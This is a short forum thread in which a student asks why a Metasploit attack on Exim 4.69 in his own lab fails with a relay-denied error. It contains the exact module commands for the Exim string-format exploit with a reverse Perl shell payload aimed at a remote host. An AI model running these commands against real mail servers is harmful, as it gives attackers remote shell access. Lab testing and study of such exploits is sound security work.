Results 1 to 3 of 3

Thread: Metasploit Question

  1. #1
    Just burned his ISO
    Join Date
    Jul 2011
    Posts
    3

    Default Metasploit Question

    Hey im doing a test on my VPS systems i installed debian with exim 4.69

    and when i run the metasploit this is what happens



    [-] Exploit exception: RCPT: 550-dsl181157.$$$$$$$$$$.net (zbwQXWNO.com) [MY IP ADDRESS ] is currently not
    550-permitted to relay through this server. Perhaps you have not logged into
    550-the pop/imap server in the last 30 minutes or do not have SMTP
    550 Authentication turned on in your email client.[*] Exploit completed, but no session was created.
    Any idea? how to fix this

  2. #2
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Metasploit Question

    I'm not sure anyone will be able to assist you without additional details. Please provide a more complete description and steps taken during the process

  3. #3
    Just burned his ISO
    Join Date
    Jul 2011
    Posts
    3

    Default Re: Metasploit Question

    Okay well in class i have to write a essay on Info Sec Pentesting

    So im doing mine one The Vulnerabilities of Linux Operating Systems to potential known threats

    One exploit i saw that was a critical hit during its time was the Exim 4.69 Exploit


    So i setup a VM network im running BT5 and i have Debian kernel Year 2010 running with Exim 4.69 default production state no installations. Well Except settig up Exim to work but other then that , thats it


    I went to my Backtrack and typed in

    Code:
    use exploit/unix/smtp/exim4_string_format
    
    set LHOST  my ip
    
    set RHOST  VM ip
    
    set PAYLOAD  cmd/unix/reverse_perl
    
    exploit

    everything goes as planned until it gets to that part and displays that error


    i installed Exim 4.69 , PostFix, Smart Host , configured to allow AUTH , even configured them all to run through a SMTP on GMail

    and it still does not work


    What exactly am i doing wrong here

Similar Threads

  1. metasploit question
    By Rob5454 in forum Beginners Forum
    Replies: 2
    Last Post: 02-28-2010, 06:34 AM
  2. question - SMB2 - metasploit
    By Jimmy Kane in forum OLD Newbie Area
    Replies: 2
    Last Post: 11-20-2009, 06:28 PM
  3. metasploit question
    By imported_apprentice in forum OLD Newbie Area
    Replies: 13
    Last Post: 09-03-2009, 04:27 AM
  4. Metasploit question
    By phoenix910 in forum OLD Pentesting
    Replies: 14
    Last Post: 08-08-2009, 09:33 PM
  5. metasploit question
    By DtL666 in forum OLD Newbie Area
    Replies: 11
    Last Post: 08-04-2009, 09:43 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •